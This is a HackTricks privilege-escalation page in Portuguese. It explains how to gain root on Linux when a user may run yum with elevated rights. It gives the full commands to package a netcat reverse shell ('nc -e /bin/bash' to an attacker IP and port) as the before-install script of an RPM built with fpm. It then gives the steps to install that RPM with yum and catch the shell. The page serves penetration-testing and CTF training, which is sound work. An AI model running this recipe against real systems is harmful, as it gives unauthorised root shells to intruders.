hacktricks/linux-unix/privilege-escalation/exploiting-yum.md

3.8 KiB

Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks:

Mais exemplos sobre yum podem ser encontrados em gtfobins.

Executando comandos arbitrários via Pacotes RPM

Verificando o Ambiente

Para aproveitar este vetor, o usuário deve ser capaz de executar comandos yum como um usuário com maiores privilégios, ou seja, root.

Um exemplo funcional deste vetor

Um exemplo funcional deste exploit pode ser encontrado na sala daily bugle no tryhackme.

Empacotando um RPM

Na seção a seguir, vou cobrir o empacotamento de um shell reverso em um RPM usando fpm.

O exemplo abaixo cria um pacote que inclui um gatilho before-install com um script arbitrário que pode ser definido pelo atacante. Quando instalado, este pacote executará o comando arbitrário. Usei um exemplo simples de shell reverso netcat para demonstração, mas isso pode ser alterado conforme necessário.

EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR

Capturando um shell

Usando o exemplo acima e assumindo que yum pode ser executado como um usuário com maiores privilégios.

  1. Transfira o rpm para o host
  2. Inicie um listener no seu host local, como o exemplo de listener netcat
  3. Instale o pacote vulnerável yum localinstall -y exploited-1.0-1.noarch.rpm
Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks: